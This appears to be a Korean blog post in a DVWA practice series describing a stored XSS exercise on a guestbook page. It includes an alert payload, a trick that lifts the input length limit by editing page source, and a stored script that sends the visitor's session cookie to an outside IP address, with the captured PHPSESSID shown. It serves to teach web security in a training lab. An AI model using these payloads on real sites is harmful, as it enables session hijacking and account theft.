반응형
Objective
Redirect everyone to a web page of your choosing
내가 선택한 웹페이지로 리다이렉트 시키는 것이 목표이다.
방명록이라, 이름, 내용에 모두 글자수 제한이 있다. 소스코드 수정으로 늘리는 것이 가능하긴 하다. Message에 <script>alert(document.cookie)</script> 를 입력하면 아래와 같이 xss 공격이 성공하는 것을 볼 수 있다.
리다이렉트하는 스크립트가 글자 수 제한에 걸려서, 소스코드에서 maxlength를 100으로 수정해주고, 아래와 같이 스크립트를 작성하여 업로드 한다.
<script>document.location='http://192.168.0.101/cookie?'+document.cookie</script>
방명록 열람시 자동으로 http://192.168.0.101/cookie?PHPSESSID=evtk6jm7v1e1kdv4o8qht8hd92;%20security=low 으로 이동하는 것을 확인할 수 있었다.
반응형
'해킹 > DVWA' 카테고리의 다른 글
DVWA 실습 14. JavaScript (Low) (0) | 2022.05.22 |
---|---|
DVWA 실습 13. CSP Bypass (Low) (0) | 2022.05.22 |
DVWA 실습 11. Reflected XSS (Low) (0) | 2022.05.21 |
DVWA 실습 10. DOM XSS (Low) (0) | 2022.05.21 |
DVWA 실습 9. Weak Session IDs (Low) (0) | 2022.05.20 |